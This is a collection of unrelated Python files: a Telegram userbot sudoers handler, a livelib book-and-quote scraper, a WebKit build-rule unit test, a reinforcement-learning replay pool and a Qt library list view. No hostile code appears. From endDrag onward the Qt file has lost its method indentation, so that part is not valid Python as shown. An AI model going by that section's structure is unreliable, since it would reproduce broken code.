@capture_err
async def userdel(_, message: Message):
    """Remove the replied-to user from the sudoers list, then restart the bot."""
    replied = message.reply_to_message
    if not replied:
        return await edit_or_reply(
            message,
            text="Jibu ujumbe wa mtu wa kumwondoa kwenye sudoers.",
        )
    target_id = replied.from_user.id
    if target_id not in await get_sudoers():
        return await edit_or_reply(
            message, text="mtumiaji hayuko sudoers."
        )
    if await remove_sudo(target_id):
        await edit_or_reply(
            message,
            text="Imefanikiwa kuondolewa mtumiaji kutoka kwa sudoer, Bot itaanzishwa upya sasa.",
        )
        return await restart(None)
    await edit_or_reply(
        message, text="Kitu kibaya kilitokea, angalia logs."
    )
@app2.on_message(
    filters.command("sudoers", prefixes=USERBOT_PREFIX)
    & filters.user(SUDOERS)
)
@capture_err
async def sudoers_list(_, message: Message):
    """Reply with a numbered list of all sudo users."""
    lines = []
    for position, user_id in enumerate(await get_sudoers(), 1):
        user = await app2.get_users(user_id)
        # Prefer the mention link; fall back to the first name.
        label = user.first_name if not user.mention else user.mention
        lines.append(f"{position}. {label}\n")
    await edit_or_reply(message, text="".join(lines))
|
import re
from collections import defaultdict
import math
from lxml import html
from lxml import etree
from .book import Book
from .quote import Quote
from .page_loader import download_page, wait_for_delay
def error_handler(where, raw):
    """Report an HTML parsing failure and return None.

    :param where: string - name of the piece that failed to parse
    :param raw: the html node that could not be handled
    :return: None (so callers can ``return error_handler(...)``)
    """
    print('ERROR: Parsing error (%s not parsed):' % where)
    print(etree.tostring(raw))
    print()
    return None
def try_get_book_link(link):
    """Validate that *link* points at a book or work page.

    :param link: string - candidate URL
    :return: the link itself when valid, otherwise None
    """
    return link if ("/book/" in link or "/work/" in link) else None
def try_get_quote_link(link):
    """Validate that *link* points at a quote page.

    :param link: string - candidate URL
    :return: the link itself when valid, otherwise None
    """
    return link if "/quote/" in link else None
# Month-name -> two-digit month number. Module scope: built once instead of
# rebuilding a defaultdict on every call, and avoids the old local name
# ``dict`` that shadowed the builtin.
_MONTHS = {
    'Январь': '01',
    'Февраль': '02',
    'Март': '03',
    'Апрель': '04',
    'Май': '05',
    'Июнь': '06',
    'Июль': '07',
    'Август': '08',
    'Сентябрь': '09',
    'Октябрь': '10',
    'Ноябрь': '11',
    'Декабрь': '12'
}


def try_parse_month(raw_month):
    """Convert a Russian month name to its two-digit number.

    :param raw_month: string - month name, e.g. 'Май'
    :return: string - '01'..'12'; unknown names map to '01' (as before)
    """
    return _MONTHS.get(raw_month, '01')
def is_last_page(page):
    """Tell whether *page* shows the empty-list marker (i.e. past the end).

    :param page: parsed html page
    :return: bool
    """
    markers = page.xpath('//div[@class="with-pad"]')
    return len(markers) > 0
def is_redirecting_page(page):
    """Detect livelib's bot-suspicion interstitial ("404") page.

    Logs a warning when detected so the caller can stop reading.
    :param page: parsed html page
    :return: bool
    """
    redirected = bool(page.xpath('//div[@class="page-404"]'))
    if redirected:
        print('ERROR: Oops! Livelib suspects that you are a bot! Reading stopped.')
        print()
    return redirected
def href_i(href, i):
    """Build the URL of page number *i* of the given listing.

    :param href: string - base listing URL
    :param i: int - page number
    :return: string - '<href>/~<i>'
    """
    page_suffix = '/~' + str(i)
    return href + page_suffix
def date_parser(date):
    """Convert a human date like 'Май 2020 г.' to 'YYYY-MM-01'.

    :param date: string
    :return: string 'YYYY-MM-01', or None when no year is found
    """
    # Raw string + escaped dot: the old pattern '\d{4} г.' used an invalid
    # escape sequence (DeprecationWarning on CPython 3.6+) and let '.'
    # match any character instead of the literal dot in 'г.'.
    m = re.search(r'\d{4} г\.', date)
    if m is None:
        return None
    year = m.group(0).split(' ')[0]
    raw_month = date.split(' ')[0]
    month = try_parse_month(raw_month)
    return '%s-%s-01' % (year, month)
def handle_xpath(html_node, request, i=0):
    """xpath wrapper: return the *i*-th matched node, or None.

    :param html_node: html node (may itself be None)
    :param request: string - xpath expression
    :param i: int - index of the wanted match (default 0)
    :return: the matched node, or None when the node/match is missing
    """
    if html_node is None:
        return None
    matches = html_node.xpath(request)
    if i < len(matches):
        return matches[i]
    return None
def format_quote_text(text):
    """Normalise quote text: tabs and newlines become single spaces.

    :param text: string or None
    :return: string or None (None passes through)
    """
    if text is None:
        return None
    return text.replace('\t', ' ').replace('\n', ' ')
def book_parser(book_html, date, status):
    """Parse one book node into a Book.

    :param book_html: html node with the book
    :param date: string or None - reading date
    :param status: string - book status (e.g. 'read')
    :return: Book, or None on parse failure
    """
    book_data = handle_xpath(book_html, './/div/div/div[@class="brow-data"]/div')
    if book_data is None:
        return error_handler('book_data', book_html)
    book_name = handle_xpath(book_data, './/a[contains(@class, "brow-book-name")]')
    # Bug fix: the old code called book_name.get('href') before checking for
    # None, raising AttributeError whenever the anchor was missing.
    if book_name is None:
        return error_handler('link', book_html)
    link = try_get_book_link(book_name.get("href"))  # the href attribute holds the link
    if link is None:
        return error_handler('link', book_html)
    name = book_name.text
    author = book_data.xpath('.//a[contains(@class, "brow-book-author")]/text()')
    if len(author):
        author = ', '.join(author)  # several authors are joined with commas
    rating = None
    if status == 'read':
        rating = handle_xpath(book_data, './/div[@class="brow-ratings"]/span/span/span/text()')
    return Book(link, status, name, author, rating, date)
def get_quote_text(card):
    """Read the text of a quote card.

    Tries the <blockquote> node first, then falls back to <p>.
    :param card: html node with the quote
    :return: string or None
    """
    node = handle_xpath(card, './/blockquote')
    if node is None:
        node = handle_xpath(card, './/p')
    if node is None:
        return None
    return format_quote_text(node.text_content())
def quote_parser(quote_html):
    """Parse one quote node into a Quote.

    :param quote_html: html node with the quote
    :return: Quote, or None on parse failure
    """
    card = handle_xpath(quote_html, './/div[@class="lenta-card"]')
    if card is None:
        return error_handler('card', quote_html)
    # Scan every anchor until both a quote link and a book link are found.
    link = None
    link_book = None
    for anchor in card.xpath('.//a'):
        if link is None:
            link = try_get_quote_link(anchor.get('href'))
        if link_book is None:
            link_book = try_get_book_link(anchor.get('href'))
    text = get_quote_text(card)
    # A "read more" link means the text is truncated; flag it with a sentinel
    # so the caller knows to fetch the quote's own page for the full text.
    if len(card.xpath('.//a[@class="read-more__link"]')):
        text = '!!!NOT_FULL###'
    book_card = handle_xpath(card, './/div[@class="lenta-card-book__wrapper"]')
    book_name = handle_xpath(book_card, './/a[@class="lenta-card__book-title"]/text()')
    book_author = handle_xpath(book_card, './/p[@class="lenta-card__author-wrap"]/a/text()')
    if link is not None and link_book is not None and text is not None:
        return Quote(link, text, Book(link_book, name=book_name, author=book_author))
    if link is None or link_book is None:
        return error_handler('link', quote_html)
    # Reaching here means both links were found but the text was missing.
    return error_handler('text', quote_html)
def slash_add(left, right):
    """Join two URL fragments with a single '/'."""
    return '/'.join((left, right))
def get_books(user_href, status, page_count=math.inf, min_delay=30, max_delay=60):
    """
    Return the list of a user's books (Book instances).
    :param user_href: string - link to the user's profile
    :param status: string - book status ('read', ...)
    :param page_count: int or float - number of pages to process (default: infinity)
    :param min_delay: int - minimum delay between requests, seconds (default 30)
    :param max_delay: int - maximum delay between requests, seconds (default 60)
    :return: list - list of Book instances
    """
    books = []
    href = slash_add(user_href, status)
    page_idx = 1
    while page_idx <= page_count:
        wait_for_delay(min_delay, max_delay)
        # On any connection error, move on to the next page
        # (the finally-clause still advances page_idx before 'continue').
        try:
            page = html.fromstring(download_page(href_i(href, page_idx)))
        except Exception:
            continue
        finally:
            page_idx += 1
        if is_last_page(page) or is_redirecting_page(page):
            break
        last_date = None
        for div_book_html in page.xpath('.//div[@id="booklist"]/div'):
            # A list node is either a date header (h2) or a book entry.
            date = handle_xpath(div_book_html, './/h2/text()')
            if date is not None:
                date = date_parser(date)
            if status == 'read' and date is not None:
                last_date = date  # remember the header date for following books
            else:
                book = book_parser(div_book_html, last_date, status)
                if book is not None:
                    books.append(book)
    return books
def get_quotes(user_href, page_count=math.inf, min_delay=30, max_delay=60):
    """
    Return the list of a user's quotes (Quote instances).
    :param user_href: string - link to the user's profile
    :param page_count: int or float - number of pages to process (default: infinity)
    :param min_delay: int - minimum delay between requests, seconds (default 30)
    :param max_delay: int - maximum delay between requests, seconds (default 60)
    :return: list - list of Quote instances
    """
    quotes = []
    href = slash_add(user_href, 'quotes')
    page_idx = 1
    while page_idx <= page_count:
        wait_for_delay(min_delay, max_delay)
        # On any connection error, move on to the next page
        # (the finally-clause still advances page_idx before 'continue').
        try:
            page = html.fromstring(download_page(href_i(href, page_idx)))
        except Exception:
            continue
        finally:
            page_idx += 1
        if is_last_page(page) or is_redirecting_page(page):
            break
        for quote_html in page.xpath('.//article'):
            quote = quote_parser(quote_html)
            if quote is not None and quote not in quotes:
                if quote.text == '!!!NOT_FULL###':  # truncated: fetch the quote's own page for the full text
                    wait_for_delay(min_delay, max_delay)
                    try:  # open the quote page; on error skip to the next quote
                        quote_page = html.fromstring(download_page(quote.link))
                    except Exception:
                        continue
                    quote.text = get_quote_text(handle_xpath(quote_page, './/article'))
                quotes.append(quote)
    return quotes
|
# Copyright (C) 2010, 2015 Apple Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
import wkbuild
class ShouldBuildTest(unittest.TestCase):
    """Table-driven tests for wkbuild.should_build().

    Each row pairs a list of changed file paths with the platform names
    expected to trigger a build: ["*"] means every platform, [] means none.
    """
    # NOTE(review): the "mac-catalina" row lists "mac-mojave" twice; harmless
    # for the membership test below, but looks like a data-entry slip.
    _should_build_tests = [
        (["ChangeLog", "Source/WebCore/ChangeLog", "Source/WebKit/ChangeLog-2011-02-11"], []),
        (["Websites/bugs.webkit.org/foo", "Source/WebCore/bar"], ["*"]),
        (["Websites/bugs.webkit.org/foo"], []),
        (["Source/JavaScriptCore/JavaScriptCore.xcodeproj/foo"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave", "ios-13", "ios-simulator-13", "tvos-13", "tvos-simulator-13", "watchos-6", "watchos-simulator-6"]),
        (["Source/JavaScriptCore/Configurations/Base.xcconfig"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave", "ios-13", "ios-simulator-13", "tvos-13", "tvos-simulator-13", "watchos-6", "watchos-simulator-6"]),
        (["Source/JavaScriptCore/JavaScriptCore.vcproj/foo", "Source/WebKit/win/WebKit2.vcproj", "Source/WebKitLegacy/win/WebKit.sln", "Tools/WebKitTestRunner/Configurations/WebKitTestRunnerCommon.vsprops"], ["win"]),
        (["LayoutTests/platform/mac/foo", "Source/WebCore/bar"], ["*"]),
        (["LayoutTests/foo"], ["*"]),
        (["LayoutTests/canvas/philip/tests/size.attributes.parse.exp-expected.txt", "LayoutTests/canvas/philip/tests/size.attributes.parse.exp.html"], ["*"]),
        (["LayoutTests/platform/mac-yosemite/foo"], ["mac-yosemite"]),
        (["LayoutTests/platform/mac-elcapitan/foo"], ["mac-yosemite", "mac-elcapitan"]),
        (["LayoutTests/platform/mac-sierra/foo"], ["mac-yosemite", "mac-elcapitan", "mac-sierra"]),
        (["LayoutTests/platform/mac-highsierra/foo"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra"]),
        (["LayoutTests/platform/mac-mojave/foo"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave"]),
        (["LayoutTests/platform/mac-catalina/foo"], ["mac-mojave", "mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave"]),
        (["LayoutTests/platform/ios-simulator/foo"], ["ios-13", "ios-simulator-13"]),
        (["LayoutTests/platform/ios-simulator-wk1/foo"], ["ios-13", "ios-simulator-13"]),
        (["LayoutTests/platform/ios-simulator-wk2/foo"], ["ios-13", "ios-simulator-13"]),
        (["LayoutTests/platform/wk2/Skipped"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave", "ios-13", "ios-simulator-13"]),
        (["LayoutTests/platform/mac-wk2/Skipped"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave"]),
        (["LayoutTests/platform/mac-wk1/compositing/tiling/transform-origin-tiled-expected.txt"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave"]),
        (["LayoutTests/platform/mac/foo"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave", "win"]),
        (["LayoutTests/platform/mac-wk2/platform/mac/editing/spelling/autocorrection-contraction-expected.txt"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave"]),
        (["LayoutTests/platform/win-xp/foo"], ["win"]),
        (["LayoutTests/platform/win-wk1/foo"], ["win"]),
        (["LayoutTests/platform/win/foo"], ["win"]),
        (["LayoutTests/platform/spi/cocoa/foo"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave", "ios-13", "ios-simulator-13", "tvos-13", "tvos-simulator-13", "watchos-6", "watchos-simulator-6"]),
        (["LayoutTests/platform/spi/cf/foo"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave", "win", "ios-13", "ios-simulator-13", "tvos-13", "tvos-simulator-13", "watchos-6", "watchos-simulator-6"]),
        (["Source/WebKitLegacy/mac/WebKit.mac.exp"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave"]),
        (["Source/WebKitLegacy/ios/WebKit.iOS.exp"], ["ios-13", "ios-simulator-13", "tvos-13", "tvos-simulator-13", "watchos-6", "watchos-simulator-6"]),
        (["Source/Dummy/foo.exp"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave", "ios-13", "ios-simulator-13", "tvos-13", "tvos-simulator-13", "watchos-6", "watchos-simulator-6"]),
        (["Source/WebCore/ios/foo"], ["ios-13", "ios-simulator-13", "tvos-13", "tvos-simulator-13", "watchos-6", "watchos-simulator-6"]),
        (["Source/WebCore/mac/foo"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave"]),
        (["Source/WebCore/win/foo"], ["win"]),
        (["Source/WebCore/bridge/objc/objc_class.mm"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave", "ios-13", "ios-simulator-13", "tvos-13", "tvos-simulator-13", "watchos-6", "watchos-simulator-6"]),
        (["Source/WebCore/platform/wx/wxcode/win/foo"], []),
        (["Source/WebCore/accessibility/ios/AXObjectCacheIOS.mm"], ["ios-13", "ios-simulator-13", "tvos-13", "tvos-simulator-13", "watchos-6", "watchos-simulator-6"]),
        (["Source/WebCore/rendering/RenderThemeMac.mm", "Source/WebCore/rendering/RenderThemeMac.h"], ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave"]),
        (["Source/WebCore/rendering/RenderThemeIOS.mm", "Source/WebCore/rendering/RenderThemeIOS.h"], ["ios-13", "ios-simulator-13", "tvos-13", "tvos-simulator-13", "watchos-6", "watchos-simulator-6"]),
        (["Tools/BuildSlaveSupport/build.webkit.org-config/public_html/LeaksViewer/LeaksViewer.js"], []),
    ]
    def test_should_build(self):
        # For every row, every known platform must build iff it is listed
        # (or the wildcard "*" is present).
        for files, platforms in self._should_build_tests:
            # FIXME: We should test more platforms here once
            # wkbuild._should_file_trigger_build is implemented for them.
            for platform in ["mac-yosemite", "mac-elcapitan", "mac-sierra", "mac-highsierra", "mac-mojave", "win", "ios-13", "ios-simulator-13", "tvos-13", "tvos-simulator-13", "watchos-6", "watchos-simulator-6"]:
                should_build = platform in platforms or "*" in platforms
                self.assertEqual(wkbuild.should_build(platform, files), should_build, "%s should%s have built but did%s (files: %s)" % (platform, "" if should_build else "n't", "n't" if should_build else "", str(files)))
# FIXME: We should run this file as part of test-rm .
# Unfortunately test-rm currently requires that unittests
# be located in a directory with a valid module name.
# 'build.webkit.org-config' is not a valid module name (due to '.' and '-')
# so for now this is a stand-alone test harness.
if __name__ == '__main__':
    unittest.main()  # stand-alone entry point; see the FIXME above
|
from gym.spaces import Dict
from .simple_replay_pool import SimpleReplayPool, Field
import numpy as np
from flatten_dict import flatten
class MultiGoalReplayPool(SimpleReplayPool):
    """Replay pool that stores each path twice: once as collected and once
    relabeled by the environment, tagging every sample with a 'relabeled'
    flag so the two variants can be told apart.
    """

    def __init__(self,
                 extra_fields=None,
                 *args,
                 **kwargs):
        """
        :param extra_fields: optional dict of extra Field definitions.

        Bug fix: the previous signature used a mutable default (``{}``)
        and mutated it in place, so the 'relabeled' field leaked into a
        dict shared across every call; ``None`` plus a local copy fixes
        that while remaining call-compatible.
        """
        extra_fields = dict(extra_fields) if extra_fields else {}
        extra_fields['relabeled'] = Field(
            name='relabeled',
            dtype='bool',
            shape=(1, ))
        super().__init__(extra_fields=extra_fields, *args, **kwargs)

    def _annotate_and_add(self, path, relabeled):
        """Attach episode-index and 'relabeled' columns to *path* (mutating
        it), store it in the pool, and return the annotated dict.

        :param path: dict (possibly nested) of per-step arrays
        :param relabeled: bool - value written into the 'relabeled' column
        """
        path_flat = flatten(path)
        # Path length is the leading dimension of any flattened field.
        path_length = path_flat[next(iter(path_flat.keys()))].shape[0]
        path.update({
            'episode_index_forwards': np.arange(
                path_length,
                dtype=self.fields['episode_index_forwards'].dtype
            )[..., None],
            'episode_index_backwards': np.arange(
                path_length,
                dtype=self.fields['episode_index_backwards'].dtype
            )[::-1, None],
            'relabeled': np.array([relabeled] * path_length)[:, None],
        })
        self.add_samples(path)
        return path

    def add_path(self, path):
        """Store *path* as collected, then store its relabeled copy."""
        annotated = self._annotate_and_add(path.copy(), relabeled=False)
        # Matches the original data flow: the relabeled variant is derived
        # from a copy of the already-annotated path.
        relabeled_path = self._environment.relabel_path(annotated.copy())
        self._annotate_and_add(relabeled_path, relabeled=True)
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
Module that contains library item tree view implementation
"""
from __future__ import print_function, division, absolute_import
import logging
import traceback
from Qt.QtCore import Qt, Signal, QPoint, QRect, QSize, QMimeData
from Qt.QtWidgets import QListView, QAbstractItemView, QRubberBand
from Qt.QtGui import QFont, QColor, QPixmap, QPalette, QPainter, QBrush, QDrag
from tpDcc.libs.qt.core import contexts as qt_contexts
from tpDcc.tools.datalibrary.core import consts
from tpDcc.tools.datalibrary.widgets import mixinview
LOGGER = logging.getLogger('tpDcc-tools-datalibrary')
class ViewerListView(mixinview.ViewerViewWidgetMixin, QListView):
    """Icon-mode list view for library items with drag & drop and a custom
    rubber-band selection; items are backed by a shared tree widget."""
    # Pixel distance the mouse must travel before a drag starts.
    DEFAULT_DRAG_THRESHOLD = consts.LIST_DEFAULT_DRAG_THRESHOLD
    # Signals re-emitted as items are moved/dropped/clicked in this view.
    itemMoved = Signal(object)
    itemDropped = Signal(object)
    itemClicked = Signal(object)
    itemDoubleClicked = Signal(object)
    def __init__(self, *args, **kwargs):
        """Set up icon-mode view defaults and drag/drop/rubber-band state."""
        QListView.__init__(self, *args, **kwargs)
        mixinview.ViewerViewWidgetMixin.__init__(self)
        # View look & behaviour
        self.setSpacing(5)
        self.setMouseTracking(True)
        self.setSelectionRectVisible(True)
        self.setViewMode(QListView.IconMode)
        self.setResizeMode(QListView.Adjust)
        self.setSelectionMode(QListView.ExtendedSelection)
        self.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
        # Drag & drop
        self.setAcceptDrops(True)
        self.setDragEnabled(True)
        self.setDragDropMode(QAbstractItemView.DragDrop)
        # Internal state
        self._tree_widget = None            # backing LibraryTreeWidget
        self._rubber_band = None            # lazily created QRubberBand
        self._rubber_band_start_pos = None  # press position of the band
        self._rubber_band_color = QColor(Qt.white)
        self._custom_sort_order = list()
        self._drag = None                   # active QDrag, if any
        self._drag_start_pos = None
        self._drag_start_index = None
        self._drop_enabled = True
        self.clicked.connect(self._on_index_clicked)
        self.doubleClicked.connect(self._on_index_double_clicked)
# ============================================================================================================
# OVERRIDES
# ============================================================================================================
    def startDrag(self, event):
        """
        Overrides base QListView startDrag function.
        Starts a QDrag carrying the selected items once the cursor has
        travelled past the drag threshold from the press position.
        :param event: QEvent
        """
        if not self.dragEnabled():
            return
        if self._drag_start_pos and hasattr(event, 'pos'):
            item = self.item_at(event.pos())
            if item and item.drag_enabled():
                self._drag_start_index = self.indexAt(event.pos())
                point = self._drag_start_pos - event.pos()
                dt = self.drag_threshold()
                # Only begin the drag once movement exceeds the threshold
                # in any direction.
                if point.x() > dt or point.y() > dt or point.x() < -dt or point.y() < -dt:
                    items = self.selected_items()
                    mime_data = self.mime_data(items)
                    pixmap = self._drag_pixmap(item, items)
                    # Centre the drag pixmap under the cursor.
                    hotspot = QPoint(pixmap.width() * 0.5, pixmap.height() * 0.5)
                    self._drag = QDrag(self)
                    self._drag.setPixmap(pixmap)
                    self._drag.setHotSpot(hotspot)
                    self._drag.setMimeData(mime_data)
                    self._drag.start(Qt.MoveAction)
def endDrag(self):
"""
Function that ends current drag
"""
self._drag_start_pos = None
self._drag_start_index = None
if self._drag:
del self._drag
self._drag = None
def dragEnterEvent(self, event):
"""
Overrides bae QListView dragEnterEvent function
:param event: QDragEvent
"""
mimedata = event.mimeData()
if (mimedata.hasText() or mimedata.hasUrls()) and self.drop_enabled():
event.accept()
else:
event.ignore()
def dragMoveEvent(self, event):
"""
Overrides bae QListView dragMoveEvent function
:param event: QDragEvent
"""
mimedata = event.mimeData()
if (mimedata.hasText() or mimedata.hasUrls()) and self.drop_enabled():
event.accept()
else:
event.ignore()
def dropEvent(self, event):
"""
Overrides bae QListView dropEvent function
:param event: QDropEvent
"""
item = self.item_at(event.pos())
selected_items = self.selected_item()
if selected_items and item:
if self.tree_widget().is_sort_by_custom_order():
self.move_items(selected_items, item)
else:
LOGGER.info('You can only re-order items when sorting by custom order')
if item:
item.drop_event(event)
self.itemDropped.emit(event)
# ============================================================================================================
# OVERRIDES - MIXIN
# ============================================================================================================
    def mousePressEvent(self, event):
        """
        Overrides base QListView mousePressEvent function
        :param event: QMouseEvent
        """
        item = self.item_at(event.pos())
        if not item:
            # Press on empty space clears the current selection.
            self.clearSelection()
        mixinview.ViewerViewWidgetMixin.mousePressEvent(self, event)
        if event.isAccepted():
            QListView.mousePressEvent(self, event)
            if item:
                # NOTE: This causes viewer tree widget selectionChanged signal to be emitted multiple times.
                # NOTE: This causes that item preview widgets are created twice when selecting an item in the viewer.
                # NOTE: For this reason, we block tree widgets signals before selecting the item
                with qt_contexts.block_signals(self.tree_widget()):
                    item.setSelected(True)
        self.endDrag()
        self._drag_start_pos = event.pos()
        is_left_button = self.mouse_press_button() == Qt.LeftButton
        is_item_draggable = item and item.drag_enabled()
        is_selection_empty = not self.selected_items()
        # Start a rubber-band selection only on a left press over empty
        # space or over an item that cannot be dragged.
        if is_left_button and (is_selection_empty or not is_item_draggable):
            self.rubber_band_start_event(event)
    def mouseMoveEvent(self, event):
        """
        Overrides base QListView mouseMoveEvent function
        :param event: QMouseEvent
        """
        if not self.is_dragging_items():
            is_left_button = self.mouse_press_button() == Qt.LeftButton
            # A left-button move with a hidden rubber band and a selection
            # is interpreted as the start of an item drag.
            if is_left_button and self.rubber_band().isHidden() and self.selected_items():
                self.startDrag(event)
            else:
                mixinview.ViewerViewWidgetMixin.mouseMoveEvent(self, event)
                QListView.mouseMoveEvent(self, event)
            if is_left_button:
                self.rubber_band_move_event(event)
    def mouseReleaseEvent(self, event):
        """
        Override base QListView mouseReleaseEvent function
        :param event: QMouseEvent
        """
        item = self.item_at(event.pos())
        items = self.selected_items()
        mixinview.ViewerViewWidgetMixin.mouseReleaseEvent(self, event)
        # Forward the release to QListView only when it will not clear a
        # selection we want to keep; middle-button releases are swallowed.
        if item not in items:
            if event.button() != Qt.MidButton:
                QListView.mouseReleaseEvent(self, event)
        elif not items:
            QListView.mouseReleaseEvent(self, event)
        self.endDrag()
        self.rubber_band().hide()
# ============================================================================================================
# BASE
# ============================================================================================================
def scroll_to_item(self, item, pos=None):
"""
Ensures that the item is visible
:param item: LibraryItem
:param pos: QPoint or None
"""
index = self.index_from_item(item)
pos = pos or QAbstractItemView.PositionAtCenter
self.scrollTo(index, pos)
# ============================================================================================================
# TREE WIDGET
# ============================================================================================================
def tree_widget(self):
"""
Return the tree widget that contains the items
:return: LibraryTreeWidget
"""
return self._tree_widget
def set_tree_widget(self, tree_widget):
"""
Set the tree widget that contains the items
:param tree_widget: LibraryTreeWidget
"""
self._tree_widget = tree_widget
self.setModel(tree_widget.model())
self.setSelectionModel(tree_widget.selectionModel())
def items(self):
"""
Return all the items
:return: list(LibraryItem)
"""
return self.tree_widget().items()
def row_at(self, pos):
"""
Returns the row for the given pos
:param pos: QPoint
:return:
"""
return self.tree_widget().row_at(pos)
def item_at(self, pos):
"""
Returns a pointer to the item at the coordinates p
The coordinates are relative to the tree widget's viewport
:param pos: QPoint
:return: LibraryItem
"""
index = self.indexAt(pos)
return self.item_from_index(index)
def selected_item(self):
"""
Returns the last selected non-hidden item
:return: QTreeWidgetItem
"""
return self.tree_widget().selected_item()
def selected_items(self):
"""
Returns a list of all selected non-hidden items
:return: list(QTreeWidgetItem)
"""
return self.tree_widget().selectedItems()
def insert_item(self, row, item):
"""
Inserts the item at row in the top level in the view
:param row: int
:param item: QTreeWidgetItem
"""
self.tree_widget().insertTopLevelItem(row, item)
def take_items(self, items):
"""
Removes and returns the items from the view
:param items: list(QTreeWidgetItem)
:return: list(QTreeWidgetItem)
"""
for item in items:
row = self.tree_widget().indexOfTopLevelItem(item)
self.tree_widget().takeTopLevelItem(row)
return items
def set_indexes_selected(self, indexes, value):
"""
Set the selected state for the given indexes
:param indexes: list(QModelIndex)
:param value: bool
"""
items = self.items_from_indexes(indexes)
self.set_items_selected(items, value)
def set_items_selected(self, items, value):
"""
Sets the selected state for the given items
:param items: list(LibraryItem)
:param value: bool
"""
with qt_contexts.block_signals(self.tree_widget()):
try:
for item in items:
item.setSelected(value)
except Exception:
LOGGER.error(str(traceback.format_exc()))
def move_items(self, items, item_at):
"""
Moves the given items to the position at the given row
:param items: list(LibraryItem)
:param item_at: LibraryItem
"""
scroll_value = self.verticalScrollBar().value()
self.tree_widget().move_items(items, item_at)
self.itemMoved.emit(items[-1])
self.verticalScrollBar().setValue(scroll_value)
def index_from_item(self, item):
"""
Returns QModelIndex associated with the given item
:param item: LibraryItem
:return: QModelIndex
"""
return self.tree_widget().indexFromItem(item)
def item_from_index(self, index):
"""
Return a pointer to the LibraryItem associated with the given model index
:param index: QModelIndex
:return: LibraryItem
"""
return self.tree_widget().itemFromIndex(index)
def items_from_urls(self, urls):
"""
Returns items from the given URL objects
:param urls: list(QUrl)
:return: DataItem
"""
items = list()
for url in urls:
item = self.item_from_url(url)
if item:
items.append(item)
return items
def item_from_url(self, url):
"""
Returns the item from the given url object
:param url: QUrl
:return: DataItem
"""
return self.item_from_path(url.path())
def items_from_paths(self, paths):
"""
Returns the items from the given paths
:param paths: list(str)
:return: QUrl
"""
items = list()
for path in paths:
item = self.item_from_path(path)
if item:
items.append(item)
return items
def item_from_path(self, path):
"""
Returns the item from the given path
:param path: str
:return: DataItem
"""
for item in self.items():
item_path = item.url().path()
if item_path and path == item_path:
return item
return None
# ============================================================================================================
# DRAG & DROP
# ============================================================================================================
def drop_enabled(self):
"""
Returns whether drop functionality is enabled or not
:return: bool
"""
return self._drop_enabled
def set_drop_enabled(self, flag):
"""
Sets whether drop functionality is enabled or not
:param flag: bool
"""
self._drop_enabled = flag
def drag_threshold(self):
"""
Returns current drag threshold
:return: float
"""
return self.DEFAULT_DRAG_THRESHOLD
def is_dragging_items(self):
"""
Returns whether the user is currently dragging items or not
:return: bool
"""
return bool(self._drag)
def mime_data(self, items):
"""
Returns drag mime data
:param items: list(LibraryItem)
:return: QMimeData
"""
mimedata = QMimeData()
urls = [item.url() for item in items]
text = '\n'.join([item.mime_text() for item in items])
mimedata.setUrls(urls)
mimedata.setText(text)
return mimedata
# ============================================================================================================
# RUBBER BAND
# ============================================================================================================
def create_rubber_band(self):
    """
    Creates and styles a new selection rubber band for this widget.
    :return: QRubberBand
    """
    band = QRubberBand(QRubberBand.Rectangle, self)
    palette = QPalette()
    palette.setBrush(QPalette.Highlight, QBrush(self.rubber_band_color()))
    band.setPalette(palette)
    return band
def rubber_band(self):
    """
    Returns the selection rubber band, creating it lazily on first use.
    :return: QRubberBand
    """
    if not self._rubber_band:
        # the custom rubber band replaces the built-in selection rect
        self.setSelectionRectVisible(False)
        self._rubber_band = self.create_rubber_band()
